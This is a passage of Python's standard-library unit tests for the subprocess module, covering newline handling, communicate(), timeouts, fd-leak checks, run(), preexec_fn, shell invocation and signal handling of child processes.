self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen([sys.executable, "-c", "pass"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# A Python debug build pushes something like "[42442 refs]\n"
# to stderr when the subprocess exits.
# Don't use assertStderrEqual because it strips CR and LF from output.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
import _bootlocale
for encoding in ['utf-16', 'utf-32-be']:
old_getpreferredencoding = _bootlocale.getpreferredencoding
# Indirectly via io.TextIOWrapper, Popen() defaults to
# locale.getpreferredencoding(False) and earlier in Python 3.2 to
# locale.getpreferredencoding().
def getpreferredencoding(do_setlocale=True):
return encoding
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
try:
_bootlocale.getpreferredencoding = getpreferredencoding
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args, universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
stdout, stderr = popen.communicate(input='')
finally:
_bootlocale.getpreferredencoding = old_getpreferredencoding
self.assertEqual(stdout, '1\n2\n3\n4')
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, support.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen([sys.executable, "-c", "pass"])
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
# Some heavily loaded buildbots (sparc Debian 3.x) require this much
# time to start.
self.assertEqual(p.wait(timeout=3), 0)
def test_invalid_bufsize(self):
# an invalid type for the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen([sys.executable, "-c", "pass"], None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen([sys.executable, "-c", "pass"], bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(OSError) as c:
subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# ignore errors that indicate the command was not found
if c.exception.errno not in (errno.ENOENT, errno.EACCES):
raise c.exception
@unittest.skipIf(threading is None, "threading required")
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(['nonexisting_i_hope'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
@unittest.skipIf(threading is None, "threading required")
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=20)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = mkstemp()
ofhandle, ofname = mkstemp()
efhandle, efname = mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
[sys.executable, '-c', 'pass'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
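# Tests for the high-level subprocess.run() helper and the CompletedProcess object it returns.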
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = self.run_python("import sys; sys.exit(0)", check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead capture the exception that we want to see
# below for comparison.
desired_exception = e
desired_exception.strerror += ': ' + repr(self._nonexistent_dir)
else:
self.fail("chdir to nonexistant directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_restore_signals(self):
# Code coverage for both values of restore_signals to make sure it
# at least does not blow up.
# A test for behavior would be complex. Contributions welcome.
subprocess.call([sys.executable, "-c", ""], restore_signals=True)
subprocess.call([sys.executable, "-c", ""], restore_signals=False)
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getpgid(os.getpid()))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_pgid = os.getpgid(os.getpid())
child_pgid = int(output)
self.assertNotEqual(parent_pgid, child_pgid)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, [sys.executable, "-c", "pass"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
def test_args_string(self):
# args is a string
fd, fname = mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!/bin/sh\n")
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!/bin/sh\n")
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
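    # Helper pair: _save_fds duplicates each fd (remembering its inheritable flag) so a test can
    # temporarily close or remap the standard fds, and _restore_fds puts the originals back.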
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
err = support.strip_python_stderr(err)
self.assertEqual((out, err), (b'apple', b'orange'))
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = support.strip_python_stderr(os.read(temp_fds[0], 1024))
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = support.strip_python_stderr(os.read(stderr_no, 1024))
finally:
